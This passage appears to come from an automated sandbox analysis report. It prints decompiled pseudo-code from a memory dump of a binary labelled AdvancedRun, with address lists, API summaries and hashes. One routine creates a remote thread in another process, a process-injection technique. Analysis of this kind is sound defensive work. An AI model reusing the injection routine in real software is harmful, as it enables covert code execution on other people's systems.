					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                                                                                                                          0x0040a27d
                                                                                                                                                                                                                          0x0040a286
                                                                                                                                                                                                                          0x0040a290
                                                                                                                                                                                                                          0x0040a29d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a32f
                                                                                                                                                                                                                          0x0040a29f
                                                                                                                                                                                                                          0x0040a2a4
                                                                                                                                                                                                                          0x0040a2ad
                                                                                                                                                                                                                          0x0040a2b6
                                                                                                                                                                                                                          0x0040a2bc
                                                                                                                                                                                                                          0x0040a2be
                                                                                                                                                                                                                          0x0040a2c4
                                                                                                                                                                                                                          0x0040a2c8
                                                                                                                                                                                                                          0x0040a2ce
                                                                                                                                                                                                                          0x0040a2e3
                                                                                                                                                                                                                          0x0040a2ed
                                                                                                                                                                                                                          0x0040a2fb
                                                                                                                                                                                                                          0x0040a2fe
                                                                                                                                                                                                                          0x0040a305
                                                                                                                                                                                                                          0x0040a30c
                                                                                                                                                                                                                          0x0040a30f
                                                                                                                                                                                                                          0x0040a313
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a31a
                                                                                                                                                                                                                          0x0040a338

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
                                                                                                                                                                                                                          • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                                                                                                                            • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                                                                            • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 283512611-3993045852
                                                                                                                                                                                                                          • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                                                                          • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                                                                                                                          0x00401093
                                                                                                                                                                                                                          0x00401096
                                                                                                                                                                                                                          0x00401097
                                                                                                                                                                                                                          0x0040109b
                                                                                                                                                                                                                          0x004010a3
                                                                                                                                                                                                                          0x004010a5
                                                                                                                                                                                                                          0x00401270
                                                                                                                                                                                                                          0x00401278
                                                                                                                                                                                                                          0x004012b3
                                                                                                                                                                                                                          0x0040127a
                                                                                                                                                                                                                          0x00401293
                                                                                                                                                                                                                          0x004012a2
                                                                                                                                                                                                                          0x004012a2
                                                                                                                                                                                                                          0x004012c1
                                                                                                                                                                                                                          0x004012d9
                                                                                                                                                                                                                          0x004012ea
                                                                                                                                                                                                                          0x004012ec
                                                                                                                                                                                                                          0x004012f6
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004010ab
                                                                                                                                                                                                                          0x004010ab
                                                                                                                                                                                                                          0x004010ac
                                                                                                                                                                                                                          0x00401231
                                                                                                                                                                                                                          0x00401236
                                                                                                                                                                                                                          0x00401239
                                                                                                                                                                                                                          0x0040123d
                                                                                                                                                                                                                          0x00401249
                                                                                                                                                                                                                          0x00401249
                                                                                                                                                                                                                          0x0040124c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401252
                                                                                                                                                                                                                          0x00401259
                                                                                                                                                                                                                          0x00401265
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401265
                                                                                                                                                                                                                          0x0040123f
                                                                                                                                                                                                                          0x0040123f
                                                                                                                                                                                                                          0x00401243
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401243
                                                                                                                                                                                                                          0x004010b2
                                                                                                                                                                                                                          0x004010b2
                                                                                                                                                                                                                          0x004010b5
                                                                                                                                                                                                                          0x004011e1
                                                                                                                                                                                                                          0x004011e3
                                                                                                                                                                                                                          0x004011e6
                                                                                                                                                                                                                          0x0040120e
                                                                                                                                                                                                                          0x00401216
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040121c
                                                                                                                                                                                                                          0x00401224
                                                                                                                                                                                                                          0x00401226
                                                                                                                                                                                                                          0x00401229
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040122f
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040122f
                                                                                                                                                                                                                          0x00401229
                                                                                                                                                                                                                          0x004011e8
                                                                                                                                                                                                                          0x004011e8
                                                                                                                                                                                                                          0x004011ed
                                                                                                                                                                                                                          0x004011fb
                                                                                                                                                                                                                          0x00401203
                                                                                                                                                                                                                          0x00401203
                                                                                                                                                                                                                          0x004010bb
                                                                                                                                                                                                                          0x004010bb
                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                          0x00401151
                                                                                                                                                                                                                          0x0040115a
                                                                                                                                                                                                                          0x00401168
                                                                                                                                                                                                                          0x0040116b
                                                                                                                                                                                                                          0x0040116e
                                                                                                                                                                                                                          0x00401170
                                                                                                                                                                                                                          0x00401173
                                                                                                                                                                                                                          0x00401180
                                                                                                                                                                                                                          0x00401182
                                                                                                                                                                                                                          0x00401185
                                                                                                                                                                                                                          0x004011a4
                                                                                                                                                                                                                          0x004011ac
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011b2
                                                                                                                                                                                                                          0x004011ba
                                                                                                                                                                                                                          0x004011bc
                                                                                                                                                                                                                          0x004011c7
                                                                                                                                                                                                                          0x004011c9
                                                                                                                                                                                                                          0x004011cb
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011d1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011d1
                                                                                                                                                                                                                          0x004011cb
                                                                                                                                                                                                                          0x00401187
                                                                                                                                                                                                                          0x00401187
                                                                                                                                                                                                                          0x00401199
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401199
                                                                                                                                                                                                                          0x004010c6
                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004010ce
                                                                                                                                                                                                                          0x004010ce
                                                                                                                                                                                                                          0x004010d7
                                                                                                                                                                                                                          0x004010e5
                                                                                                                                                                                                                          0x004010e8
                                                                                                                                                                                                                          0x004010eb
                                                                                                                                                                                                                          0x004010ed
                                                                                                                                                                                                                          0x004010f0
                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                          0x0040111d
                                                                                                                                                                                                                          0x00401125
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040112b
                                                                                                                                                                                                                          0x00401133
                                                                                                                                                                                                                          0x00401135
                                                                                                                                                                                                                          0x00401140
                                                                                                                                                                                                                          0x00401142
                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                          0x00401104
                                                                                                                                                                                                                          0x0040110a
                                                                                                                                                                                                                          0x0040110b
                                                                                                                                                                                                                          0x0040110b
                                                                                                                                                                                                                          0x0040110e
                                                                                                                                                                                                                          0x00401115
                                                                                                                                                                                                                          0x00401117
                                                                                                                                                                                                                          0x00401117
                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                          0x004010b5
                                                                                                                                                                                                                          0x004010ac
                                                                                                                                                                                                                          0x00401303

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                          • String ID: AdvancedRun
                                                                                                                                                                                                                          • API String ID: 829165378-481304740
                                                                                                                                                                                                                          • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                                                                          • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                                          			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                                                                                                                          0x00408ae3
                                                                                                                                                                                                                          0x00408aeb
                                                                                                                                                                                                                          0x00408af3
                                                                                                                                                                                                                          0x00408b76
                                                                                                                                                                                                                          0x00408b8a
                                                                                                                                                                                                                          0x00408b91
                                                                                                                                                                                                                          0x00408b98
                                                                                                                                                                                                                          0x00408bb1
                                                                                                                                                                                                                          0x00408bb3
                                                                                                                                                                                                                          0x00408bc6
                                                                                                                                                                                                                          0x00408bcc
                                                                                                                                                                                                                          0x00408bda
                                                                                                                                                                                                                          0x00408be0
                                                                                                                                                                                                                          0x00408bf3
                                                                                                                                                                                                                          0x00408bfa
                                                                                                                                                                                                                          0x00408c0b
                                                                                                                                                                                                                          0x00408c12
                                                                                                                                                                                                                          0x00408c17
                                                                                                                                                                                                                          0x00408c1a
                                                                                                                                                                                                                          0x00408c2c
                                                                                                                                                                                                                          0x00408c39
                                                                                                                                                                                                                          0x00408c3d
                                                                                                                                                                                                                          0x00408c3f
                                                                                                                                                                                                                          0x00408c41
                                                                                                                                                                                                                          0x00408c52
                                                                                                                                                                                                                          0x00408c58
                                                                                                                                                                                                                          0x00408c58
                                                                                                                                                                                                                          0x00408c6f
                                                                                                                                                                                                                          0x00408c71
                                                                                                                                                                                                                          0x00408c73
                                                                                                                                                                                                                          0x00408c83
                                                                                                                                                                                                                          0x00408c89
                                                                                                                                                                                                                          0x00408c89
                                                                                                                                                                                                                          0x00408c8a
                                                                                                                                                                                                                          0x00408c8f
                                                                                                                                                                                                                          0x00408c91
                                                                                                                                                                                                                          0x00408c9a
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c9f
                                                                                                                                                                                                                          0x00408ca5
                                                                                                                                                                                                                          0x00408caf
                                                                                                                                                                                                                          0x00408cbc
                                                                                                                                                                                                                          0x00408cc2
                                                                                                                                                                                                                          0x00408cc7
                                                                                                                                                                                                                          0x00408ccd
                                                                                                                                                                                                                          0x00408cd0
                                                                                                                                                                                                                          0x00408cd6
                                                                                                                                                                                                                          0x00408cd7
                                                                                                                                                                                                                          0x00408cd8
                                                                                                                                                                                                                          0x00408cde
                                                                                                                                                                                                                          0x00408ce3
                                                                                                                                                                                                                          0x00408ceb
                                                                                                                                                                                                                          0x00408cfe
                                                                                                                                                                                                                          0x00408d03
                                                                                                                                                                                                                          0x00408d06
                                                                                                                                                                                                                          0x00408d0c
                                                                                                                                                                                                                          0x00408d21
                                                                                                                                                                                                                          0x00408d27
                                                                                                                                                                                                                          0x00408d0c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408ca7
                                                                                                                                                                                                                          0x00408ca7
                                                                                                                                                                                                                          0x00408cad
                                                                                                                                                                                                                          0x00408d28
                                                                                                                                                                                                                          0x00408d2e
                                                                                                                                                                                                                          0x00408d35
                                                                                                                                                                                                                          0x00408d36
                                                                                                                                                                                                                          0x00408d42
                                                                                                                                                                                                                          0x00408d48
                                                                                                                                                                                                                          0x00408d4e
                                                                                                                                                                                                                          0x00408d54
                                                                                                                                                                                                                          0x00408d5a
                                                                                                                                                                                                                          0x00408d60
                                                                                                                                                                                                                          0x00408d66
                                                                                                                                                                                                                          0x00408d6c
                                                                                                                                                                                                                          0x00408d72
                                                                                                                                                                                                                          0x00408d73
                                                                                                                                                                                                                          0x00408d7f
                                                                                                                                                                                                                          0x00408d85
                                                                                                                                                                                                                          0x00408d8a
                                                                                                                                                                                                                          0x00408d8f
                                                                                                                                                                                                                          0x00408d90
                                                                                                                                                                                                                          0x00408da8
                                                                                                                                                                                                                          0x00408db9
                                                                                                                                                                                                                          0x00408dbf
                                                                                                                                                                                                                          0x00408dc5
                                                                                                                                                                                                                          0x00408dc5
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408cad
                                                                                                                                                                                                                          0x00408ca5
                                                                                                                                                                                                                          0x00408af6
                                                                                                                                                                                                                          0x00408afc
                                                                                                                                                                                                                          0x00408b07
                                                                                                                                                                                                                          0x00408b2a
                                                                                                                                                                                                                          0x00408b38
                                                                                                                                                                                                                          0x00408b53
                                                                                                                                                                                                                          0x00408b56
                                                                                                                                                                                                                          0x00408b62
                                                                                                                                                                                                                          0x00408b6a
                                                                                                                                                                                                                          0x00408b6a
                                                                                                                                                                                                                          0x00408b2a
                                                                                                                                                                                                                          0x00408b07
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • {Unknown}, xrefs: 00408BA5
                                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                          • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                                                                          • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                          			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                                                                                                                          0x0040b04d
                                                                                                                                                                                                                          0x0040b05e
                                                                                                                                                                                                                          0x0040b060
                                                                                                                                                                                                                          0x0040b063
                                                                                                                                                                                                                          0x0040b06a
                                                                                                                                                                                                                          0x0040b06d
                                                                                                                                                                                                                          0x0040b076
                                                                                                                                                                                                                          0x0040b07b
                                                                                                                                                                                                                          0x0040b07e
                                                                                                                                                                                                                          0x0040b084
                                                                                                                                                                                                                          0x0040b08e
                                                                                                                                                                                                                          0x0040b0a8
                                                                                                                                                                                                                          0x0040b0aa
                                                                                                                                                                                                                          0x0040b0ad
                                                                                                                                                                                                                          0x0040b0b0
                                                                                                                                                                                                                          0x0040b0b3
                                                                                                                                                                                                                          0x0040b0b6
                                                                                                                                                                                                                          0x0040b0b8
                                                                                                                                                                                                                          0x0040b0bb
                                                                                                                                                                                                                          0x0040b0be
